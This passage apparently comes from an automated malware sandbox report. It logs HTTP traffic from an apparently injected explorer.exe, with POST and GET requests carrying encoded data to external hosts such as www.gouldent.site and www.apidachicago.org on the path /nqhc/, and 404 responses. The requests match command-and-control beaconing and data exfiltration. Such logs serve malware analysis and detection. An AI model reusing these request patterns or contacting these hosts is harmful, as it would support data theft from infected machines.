32 6d 49 6b 76 77 68 72 34 47 76 76 48 52 6a 71 33 75 6f 52 6d 62 53 4d 41 54 44 71 78 61 78 56 4b 61 76 62 6e 32 34 2d 59 52 39 52 49 76 68 5f 28 6a 41 43 7a 39 72 6c 6d 6a 52 53 62 61 70 54 51 51 42 4e 77 76 44 79 7a 33 6d 35 7e 46 45 4d 6f 31 65 61 35 59 76 50 73 4a 4b 4e 4c 61 30 50 64 52 68 7a 52 65 69 72 63 69 37 4e 45 72 74 30 7a 41 72 2d 71 6a 6d 75 64 45 33 4c 43 66 42 41 43 52 53 4f 53 73 77 4d 55 32 59 61 52 71 5a 65 33 65 42 34 6e 34 6c 6e 31 66 33 66 43 5f 72 74 44 36 4c 4b 28 74 75 6f 42 5f 30 61 58 75 44 76 77 74 55 73 4d 66 48 66 6f 44 78 4d 33 4f 32 6b 68 78 44 35 6f 58 43 76 30 59 45 32 4f 71 31 41 76 65 77 4b 44 71 39 67 41 69 76 78 32 31 71 76 35 75 6b 59 42 65 65 5f 76 52 48 56 6c 62 37 56 68 6e 65 76 4f 31 71 68 46 4e 5a 78 41 4e 78 43 48 4a 48 69 66 59 32 69 31 75 6d 6f 79 73 30 71 4f 70 39 53 32 47 38 72 78 32 4d 79 6b 4c 65 70 68 6b 78 4d 45 64 7e 30 78 31 77 6e 74 33 41 36 31 34 53 33 64 72 67 52 78 64 4d 54 69 69 36 63 61 5f 35 55 52 76 28 41 50 57 4a 49 30 54 55 59 66 56 31 69 49 63 30 57 7e 37 55 50 78 74 58 2d 71 58 35 38 54 59 76 4c 45 51 6a 45 34 62 76 66 50 51 52 51 4c 76 7e 49 45 55 67 55 53 7a 35 4b 56 62 41 76 72 73 32 75 62 72 4f 39 68 57 6c 64 6a 4d 4e 6c 41 7a 69 53 41 5a 7a 30 6e 63 71 33 4b 69 56 4e 48 6c 54 38 76 36 61 65 4c 4f 4d 56 6b 34 4f 71 53 6e 4b 65 37 5a 35 5a 6a 71 28 6b 51 71 42 46 64 39 6c 44 41 49 68 44 33 53 43 59 76 5f 52 45 74 57 4f 4a 7a 37 28 68 39 79 4a 6b 55 67 43 7a 30 47 36 66 37 53 41 68 7a 6e 62 45 39 77 72 35 65 2d 41 4e 6a 32 39 4d 50 4f 45 4e 69 6b 32 4c 42 66 32 7a 53 70 55 65 33 39 79 78 68 6d 65 45 30 76 72 47 6f 6b 74 75 57 30 61 57 49 66 55 31 4d 67 5a 39 4a 34 74 50 31 50 43 37 7e 42 55 6a 4b 36 63 52 75 34 47 68 48 47 46 34 65 52 30 33 5a 4e 59 61 77 6f 67 35 50 41 71 68 4e 67 6a 4e 4a 31 56 79 58 73 31 6a 4f 59 68 4a 33 6c 35 54 34 4b 78 53 76 48 46 48 7a 42 67 61 6a 49 66 48 47 42 43 66 31 6f 75 49 48 7a 50 49 7a 45 77 4e 63 6a 43 66 56 4a 46 46 77 44 49 54 5a 2d 4a 6b 57 52 4b 77 7e 56 77 6b 47 55 57 31 78 4f 65 55 53 2d 37 44 6c 33 47 72 39 33 68 44 49 5a 42 2d 37 68 6a 62 50 44 41 68 6f 63 72 6b 57 55 47 67 5a 38 33 68 33 71 6d 70 6d 45 66 59 44 37 6f 6a 71 41 41 63 77 45 61 59 68 4e 58 6f 62 64 44 64 6d 74 77 69 76 33 73 4d 77 79 48 31 62 63 63 6f 34 45 63 62 39 72 4c 48 69 53 48 48 78 6d 6a 32 6d 72 67 59 32 4e 30 75 54 51 73 42 53 64 72 4c 6c 57 65 38 42 4c 59 33 75 66 7a 4b 61 36 46 5a 64 6b 77 51 62 59 4d 53 48 6e 31 6c 71 4b 55 6e 6d 6f 38 4d 35 68 52 71 77 4c 63 4a 36 34 64 67 53 7a 33 33 6f 77 45 77 4f 64 64 51 68 42 4c 62 49 61 50 43 56 4f 56 54 37
                                                                                                                                                                          Data Ascii: 7nWHV=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB8zL8UQk0xOxnLslI(yvvbr2_fJ3drQ9OkoIzEQ3KyP4dwo7nsnQ1AySTRawIg1lUWARX122ytfT2irTM3c6HNzQctoHKhHER8XzfDoD1bh1b8Vo0Nt4CE6mpgeMQaFKp8Qvjyp~M6ipGYxQCX4zh9HMdvuW3WPHRtgNxO6kC8f48SiyYNgWLuIZATCeIAK4BmhaZvyMHJ0ec4QGzBvj7wUtyABxPZaz0yqELS7TU2VHwWqa5h7s7xkkauf24J5g-RzukJOORNH079DBYEH0zv3JUs96F1Usd2_Gna9usKqlOBMlz2qTgyWHc7JBQF_i4FcJO6qpZsFrPibWR~-eUuucwOb8ZyLCktz0Nmup2ag2f4ts6LzEAiEq5CVpasAXw91uW(M(vxgf75nSdmo1k8uIXuHZAG4k3iBodAPiHAyysXVbSNaJ2cSTMzUAUIGF0bCspQU2mIkvwhr4GvvHRjq3uoRmbSMATDqxaxVKavbn24-YR9RIvh_(jACz9rlmjRSbapTQQBNwvDyz3m5~FEMo1ea5YvPsJKNLa0PdRhzReirci7NErt0zAr-qjmudE3LCfBACRSOSswMU2YaRqZe3eB4n4ln1f3fC_rtD6LK(tuoB_0aXuDvwtUsMfHfoDxM3O2khxD5oXCv0YE2Oq1AvewKDq9gAivx21qv5ukYBee_vRHVlb7VhnevO1qhFNZxANxCHJHifY2i1umoys0qOp9S2G8rx2MykLephkxMEd~0x1wnt3A614S3drgRxdMTii6ca_5URv(APWJI0TUYfV1iIc0W~7UPxtX-qX58TYvLEQjE4bvfPQRQLv~IEUgUSz5KVbAvrs2ubrO9hWldjMNlAziSAZz0ncq3KiVNHlT8v6aeLOMVk4OqSnKe7Z5Zjq(kQqBFd9lDAIhD3SCYv_REtWOJz7(h9yJkUgCz0G6f7SAhznbE9wr5e-ANj29MPOENik2LBf2zSpUe39yxhmeE0vrGoktuW0aWIfU1MgZ9J4tP1PC7~BUjK6cRu4GhHGF4eR03ZNYawog5PAqhNgjNJ1VyXs1jOYhJ3l5T4KxSvHFHzBgajIfHGBCf1ouIHzPIzEwNcjCfVJFFwDITZ-JkWRKw~VwkGUW1xOeUS-7Dl3Gr93hDIZB-7hjbPDAhocrkWUGgZ83h3qmpmEfYD7ojqAAcwEaYhNXobdDdmtwiv3sMwyH1bcco4Ecb9rLHiSHHxmj2mrgY2N0uTQsBSdrLlWe8BLY3ufzKa6FZdkwQbYMSHn1lqKUnmo8M5hRqwLcJ64dgSz33owEwOddQhBLbIaPCVOVT7DVadkeEaLtw9rs6pWsasZ8rqCmu35Okbs3Pa63SkOA6SS5_O_WryzAkw7LD8_G2~o~UNju48aOXVgkVQLTTfowIangsu1ljWsVd8-OpOgA1l3iIn3QU9zl1CHva8kZoAB5rkpoMYqBqmiCM2zdkT7OdRwP3di6I8V~AkjwoRtIQMz2fO8oHkWZnXrKSowikA3~U~0IpKEADpcdrdo6o0Uz7Dcsmvoe0PvkCIC9ISoNRfjzIY0f30WCMjzz99LStqdYG4-wLXPLrjioO93f6r-uzaYrl4JWXhPol00L-lOD0wsniNgV8GTtwHUeaZopLQvr414ujYBNmUphoq6NIEm7Fbv8DUPLpu5NTW_Y71KkyjLYEEPiy1JhiEOR8cI9Kv8IazTcXHmOEVtIGFKrYZY6v8FvgIWVFIYL53_mChxK5QfCv6Cwt5F0WGrUif2SVdpeCbPsu4j3Dmzz82mvmZgThORs64lcvWUpb(v7fEG12r-q5xekN0AGedx(rD_vd9QPafkemONulqcRrFWgbiLFJ8g80ZMVLWsg_(hkavUASzhjtkd8C9qEfyS(uWGrKqM24PA9oVmLZu4nv9z710PbYPrkt6SpaXjQ6cfSGWBTT2nKfR7hr3laXee2vCOn9ZePUasQscYurZWxG5PszfZVgTlU19N(vf5x5k-5mVaavLu46CHAjf4iFXtFuKoF-MExV0DZ3FRbjOaon6EcXG5YQM4LxpHIuXdsLPBly7tVmlKGXaVKgftlWWOSTQYihWml95YF-0_ZUB7chJg7KTmzfkuIXPhDxTPxBmIrV2ZnFOmFkszmw5CU1LY0YYaY27MVo0zd7P9zN6Bj8~CCaPOtLPRMVSH54uIxXYCMr5W1wB-vD8eK2i1UOfxhq7C6plvi1IrYBh4y1iRJU9YprAGpTmJSIuOkNS2c05b8PqpfemvqbGVcdKLoW3MldLZc3aOE2Iv9EEtEm8oTfjkt3AuDjygINjEO6vkryLn(4qPGuROESrCyi0bLWHuLNcT7R9lxVxVCw(B7sIlNADVbCdiumUEHvtmLgqCsKKaEcfTPXIl~SUnZnBXtPCYEFT4yoFNWRFxhALytCyD2dmidLUj5A6gAR7XAJvJsVx912ECq_lXJSkluGed56TqTHqZU0zwLpyk1uVySIdgHOFTOvKNYd7EqmuyGskErbcKbIL9qeTLGBfpSA3DrYtRrYxIbwb0LcLBItQzU9sNUGvCxWHYMJq8BPf5BdKn9aIewYu33qN19NnI7PavKNHw9UNbqL5Vd5C4fhs6k43q2-qz9296gC4TvKYuC-Scgmu0K8CfhKIw2Kz9y0tnXON87sh1P7(JBOeqWhywHaHtj0LepkL07soWdhSBGfNH4RJdG211gVrJIJLAph8W6WCqCTjLHyfEhAIRshcWtt32W9H94xFwLK6L51LS0kSnKf6Mcop4oym3XClYE6SZI3A4tWfkOTZFjmG-Iyz00Ogs0V0t5EfaT1XYg1VnZ5SEUtk6CaYV3oG2tHCcuuolHxLUGjeFrSo-0oHDwrpPmc2cJOBKqWfvCIPDR4nt(66NxYnINfL1rnAAoH0aJkAxOJG_~cADF69LZvnYkTRHDoir5q0N6KRswtv7zkY0hyzqWAt6VtddxIFwmTLp7h5CCWKTS1tOF-~NMzvOPwFgSQD6~nvYAtoxAB0rd6GM1pgfVB(gNrbW9dC7hEGxIByQoaAUtCvBvOlEDRBC(bKWks~umS4yOEjnhGr8f1Du4AvDw3CgIGCManj3N5E-9lUJf-QPk4dHfnbfEFyFV2uXK34c9QmBM5opuA2WtlsyyZLGqtKxjm~Bx1DZ4FbKvUbANGoFNPMpnZBMa_rU7229IwCLvrkYrvrICzwUqUObRxCm0JUwZOLMopFDLsf-U8XG2pYxT1tdHz8f2Fnt(pNlbSV9s-QQRMVz3IDX3PvysAjGYna4aSZtltDTlsV-ygBScBjKFn9gEQnuDyhyiKXXDoxcuIXtc6j_sH6rHowZsQIFbjhGbhLT6pYMY3CuoGyF667ie1Vpa8OAkcUs4AiZz7HZYFq5xLUcFs0mleM15TpIw0mXbNAAWVMxtvOh9Q9bfmaSqjcGeezYKPsQ1ZLQzPphnA4yvxRe99ejKJg7g3nAHhMfP4rDAXFAQRgvA0PtWiFDiM12F4l9sRW4I54LmGqRavtXz8beI11Dw9jUZhsrgzKaziK1EIpBrJLqCIFQvbHXOrnbYLSkQrQbwn4aIwFcDqN_~NgPVyn8bKs9PKv90LyIgKD5ItOInaBVw_tyzIfOttqOl8sR7yI5C8dzWK~F~U4oyKZE9KFk87dkOeX7R2yEEv32vB83fgCt2UFWIHgmfL6S0vN4gWKzPSs0mvTYUDDl3H7lkUZF02nt6xgfyK9bTZxvnbi_pVFEddpw13ubmgiNHIXRIvHYOa5SKXs6sdBMrNviNBLVf5UrI6hcDXpFA_VYwvHFjcqMlLW9I3vvcTx8GLh5kPAs3Zfhw97n4NAgt7MHJu3gQJqmknwAJTiI~1v_m0td(RD7ZfZkS6mBTfcx9Jg7NYlHD8mH~Uv4PaIxg6EpGKWe6yxUIR74qwwZtENiASN4U1UcQt(kdPOeQ3XDU3E3QsCCOifOwyFwH1foBQKdPh7t7MPN9ezWgiH6ByxbDxlBwnFWD0KeB6bjPZWOfcDUcAbbNkwDrJAvo6NZFPc7uNYf3iFs~Zcwt9
                                                                                                                                                                          Dec 5, 2022 15:16:47.697559118 CET11598OUTData Raw: 42 48 37 39 5f 76 61 65 53 32 38 65 51 78 70 73 51 78 4f 78 50 50 77 7a 68 6c 68 62 65 4e 30 54 6f 4e 5f 7a 30 47 58 6c 45 46 74 7a 51 49 53 6b 30 57 55 70 4d 30 61 5a 70 4d 6c 4c 75 48 4e 55 67 53 58 54 61 46 49 39 32 46 50 75 78 50 44 52 57 58
                                                                                                                                                                          Data Ascii: BH79_vaeS28eQxpsQxOxPPwzhlhbeN0ToN_z0GXlEFtzQISk0WUpM0aZpMlLuHNUgSXTaFI92FPuxPDRWX_r-(LtlG70K7JEcZE79VGt13gowIIoVhhDK8GsdPfzXfNGLkDwxbFLkGuVjFynMK_dKoajCsyADW_vx~ryLsBrpnOQCZK8QTuDeH7dH2P(_k6Z5LWFAlqYdxZ(ds_o6RvLTj43LVR47uXMoiB8FNHooacKZBGQ6lE
                                                                                                                                                                          Dec 5, 2022 15:16:47.856573105 CET11601OUTData Raw: 61 74 61 42 50 78 59 32 79 30 4d 78 49 45 52 44 65 41 59 52 32 78 32 52 5f 38 74 75 35 70 78 76 59 58 6b 6d 73 68 4a 66 72 52 71 68 41 31 53 4c 66 71 36 43 37 4d 41 37 64 62 64 45 42 58 5f 50 43 37 69 63 72 36 33 72 61 4c 65 63 4c 36 53 53 59 78
                                                                                                                                                                          Data Ascii: ataBPxY2y0MxIERDeAYR2x2R_8tu5pxvYXkmshJfrRqhA1SLfq6C7MA7dbdEBX_PC7icr63raLecL6SSYxS5Hqlci95Gn~jLWxtAE(EMHq1M_HR881kl2e3BVxwR2uZUhHSndGp1AYKQ0QEGqtJokCudNh7~np-rR6kHkG_asDF~fr3dhHG5OfpOZo5sIX530H5zYOraBPL6ks0vHDofO6axH36LCdQKpUfcGNQnW~Teb9_8zX6
                                                                                                                                                                          Dec 5, 2022 15:16:47.856667042 CET11608OUTData Raw: 35 30 37 6c 46 4c 46 50 76 71 57 37 34 56 71 4e 32 78 6c 7a 41 4a 50 4a 6f 31 31 33 6a 68 51 75 6d 7a 55 68 59 46 5a 69 62 6c 71 67 52 48 73 71 6e 71 69 57 39 49 62 4c 6a 59 6c 67 39 66 33 39 4d 44 6e 38 65 6d 6b 7a 56 64 2d 72 79 34 51 58 47 37
                                                                                                                                                                          Data Ascii: 507lFLFPvqW74VqN2xlzAJPJo113jhQumzUhYFZiblqgRHsqnqiW9IbLjYlg9f39MDn8emkzVd-ry4QXG7mlPcxWQ~KfYB030(LWerrelPOsCK7aSltel0pbpZzTbrDDhSGeJSUk3mksC~On7g7uZ9Zeu5BI1laYRhyI0C9i3r8pneK6V0a8DhBhE24ofurUd4N5IBpQroaLEAixB~YMy2RMTkEl3uidhPxKJBeedDC3jVCZJ6U
                                                                                                                                                                          Dec 5, 2022 15:16:47.856791973 CET11616OUTData Raw: 31 51 77 52 32 41 65 4c 43 4e 32 69 31 50 4c 72 69 33 78 32 31 55 79 50 74 4a 65 49 58 49 76 79 5a 34 61 36 57 76 71 74 37 65 53 7e 4c 37 4f 69 35 64 78 7a 42 31 52 59 48 39 51 43 79 70 48 7a 44 41 71 62 32 32 6e 54 6e 58 6e 34 4b 59 2d 63 4c 54
                                                                                                                                                                          Data Ascii: 1QwR2AeLCN2i1PLri3x21UyPtJeIXIvyZ4a6Wvqt7eS~L7Oi5dxzB1RYH9QCypHzDAqb22nTnXn4KY-cLTCtFdQ9Tz0xnZd(_U8bQSLGk98RKu4KdiKbw2SEF8kRfpopM2ag2axv-9_beF1BMBLik2MPEs02Uc-FQBCgRpS0RC3fxRdsZRYMWZsX4Cwhj5X1RvrJU65OOmv2QDyJVeJxcwwHoPeUeaHGvwvOgauDhlyibWcuQ7K
                                                                                                                                                                          Dec 5, 2022 15:16:47.856955051 CET11618OUTData Raw: 65 75 67 64 77 52 46 53 61 50 6d 39 6b 30 51 44 48 6a 41 49 72 53 4b 77 38 63 4e 74 4a 4e 70 34 6b 35 39 43 6d 56 4e 50 74 7a 51 63 38 35 7a 78 5f 58 69 72 6d 5a 50 44 39 34 75 35 6b 74 6f 6d 70 73 54 53 46 56 37 43 49 70 51 51 6f 39 57 67 65 43
                                                                                                                                                                          Data Ascii: eugdwRFSaPm9k0QDHjAIrSKw8cNtJNp4k59CmVNPtzQc85zx_XirmZPD94u5ktompsTSFV7CIpQQo9WgeCPSbgKb2x0uNdDkKKnCSITI0JubtMDTrdUtBV1Bnk2xKO6E8lVMlQ4eu0mw46ZgK5BeYMWxBuaMXncGSCuG22nP7l22SkyGP6HNe0qBYvlU5egyIPQSlHP5ADQqALWx9hMq4bVkeP9r870pt9z(SvwasQY51YJ44ib
                                                                                                                                                                          Dec 5, 2022 15:16:47.857224941 CET11624OUTData Raw: 48 6a 4f 7a 4b 61 79 66 71 51 35 53 30 75 58 5a 4c 6a 4b 51 67 35 38 67 37 44 39 75 70 37 57 45 54 33 79 44 57 38 42 4f 51 4d 44 39 4a 64 73 44 4d 70 78 4b 6e 7e 61 65 48 33 39 78 76 73 6b 6c 55 70 4d 37 56 75 5f 4f 45 36 61 78 2d 6c 71 48 62 78
                                                                                                                                                                          Data Ascii: HjOzKayfqQ5S0uXZLjKQg58g7D9up7WET3yDW8BOQMD9JdsDMpxKn~aeH39xvsklUpM7Vu_OE6ax-lqHbxTuKhd7L(c8rxUxIfKuM8E2NYcJ8~sTtcHKINU6R9wXbdqu7TSH9t0h_VwCCDXmgR5BYQg3thmF9xae4rCq4Alf-Wv2FKrW3tn6HWgoKjybfUYBpXNLnapJzKEzhcCrI~lCH~VpvMyc2XusRxeFP~xLx8B8wu3Ib(0
                                                                                                                                                                          Dec 5, 2022 15:16:48.015747070 CET11630OUTData Raw: 5f 71 6b 28 74 6f 6e 31 42 64 4c 43 78 51 6d 6e 4f 61 34 6d 2d 74 4d 66 31 6c 6a 6f 6f 46 77 68 51 6a 74 4f 4b 37 39 4a 30 51 61 36 48 4c 4c 64 42 54 6d 36 5a 6f 70 66 33 64 31 65 51 71 6b 68 57 4e 44 59 54 4f 48 54 67 49 2d 28 62 44 74 4f 34 71
                                                                                                                                                                          Data Ascii: _qk(ton1BdLCxQmnOa4m-tMf1ljooFwhQjtOK79J0Qa6HLLdBTm6Zopf3d1eQqkhWNDYTOHTgI-(bDtO4qf1kO1DchNfVK2lyL1lVeLTALQqaRuvZ57fLxMzy0aawAlX1Twm4otE6mncRFgGKWlJ_QoumHqMbhBY6iHuSRXlvqp7XQ4lNMr3GR653uB(3uDjz1qafu144Ja4Aplx9BeTKYcA8GF(RWqchgVKKL-EIOlQXc47fsn
                                                                                                                                                                          Dec 5, 2022 15:16:48.015846014 CET11636OUTData Raw: 35 66 77 39 48 43 47 6f 6e 62 70 4f 45 69 32 28 78 71 42 31 32 59 69 57 70 34 79 63 4f 4b 58 73 52 78 53 34 4d 62 56 79 53 46 59 53 4b 7e 44 42 6e 32 47 41 47 34 32 6a 49 51 59 72 77 5a 34 76 64 37 53 38 34 72 76 38 5a 77 4c 31 4c 39 53 61 34 61
                                                                                                                                                                          Data Ascii: 5fw9HCGonbpOEi2(xqB12YiWp4ycOKXsRxS4MbVySFYSK~DBn2GAG42jIQYrwZ4vd7S84rv8ZwL1L9Sa4a_b8dQm0GfCDdeJp9TmJD3blz0O6iCQdPgKdgfJLJ5RFRqO815eWHwBdJHV3WBxXXAE8H1LvnbapT7Nl~aJnPS65nlRDj6a8eexgM9MAkCjt5golstG8ptQ-jQOuJAsg1q7we4UDyWM43JLMTlllcx7WZLYdVAFfKM
                                                                                                                                                                          Dec 5, 2022 15:16:48.016829014 CET11637OUTData Raw: 71 4f 48 28 71 53 43 6e 4d 65 6f 58 69 63 76 72 4c 46 55 38 38 39 36 74 73 63 70 6d 48 4c 56 37 76 6d 34 4f 37 64 64 64 6b 75 74 6d 79 34 4c 6f 6d 58 33 6c 4b 66 57 39 47 63 34 6a 4d 35 71 72 4a 71 55 4b 48 66 6c 6f 46 58 47 77 37 65 44 59 68 76
                                                                                                                                                                          Data Ascii: qOH(qSCnMeoXicvrLFU8896tscpmHLV7vm4O7dddkutmy4LomX3lKfW9Gc4jM5qrJqUKHfloFXGw7eDYhv2FPqmTb60W9TZtks76kQk6xq8eZZDwaKTGv~25nlR1C(kU7oENYarMeYSBlgAyU0_bjlg94vpmaZ-Y3nR3alI3krvs4Tsq-nzOjWX71wesOm1d3rPknZeDe41D0exawdbvdro2xPzRPZYsM0kfL6k4587zfk7gMu-
                                                                                                                                                                          Dec 5, 2022 15:16:48.341778040 CET11639INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:47 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          34192.168.11.204987466.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:49.885667086 CET11639OUTGET /nqhc/?7nWHV=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:16:50.208544016 CET11640INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:49 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          35192.168.11.2049876194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:55.403830051 CET11648OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.apidachicago.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.apidachicago.org
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.apidachicago.org/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 33 39 34 78 30 70 64 78 41 5f 36 31 65 67 54 47 30 4d 45 44 41 43 43 76 73 4d 7a 66 36 6e 52 73 49 4a 6b 78 7a 38 66 47 78 4d 6f 44 71 39 63 65 6f 4f 66 64 63 67 54 77 7a 68 70 35 42 46 31 6b 43 55 6a 63 30 6c 70 44 48 4d 51 4c 79 68 39 71 39 32 53 31 4a 4d 59 62 44 72 28 67 50 6c 31 67 64 5f 56 7a 4a 34 4d 51 6d 71 69 6b 7a 33 6f 44 36 69 37 4e 6f 62 36 54 62 2d 6f 70 36 53 52 5a 6c 74 75 78 47 57 52 7a 78 6f 79 69 6c 4f 5a 6c 74 37 77 67 50 2d 64 4a 37 52 49 52 46 45 4a 6a 51 30 67 52 4c 36 4f 2d 73 49 5a 32 39 5f 6d 46 7e 77 29 2e 00 00 00 00 00 00 00 00
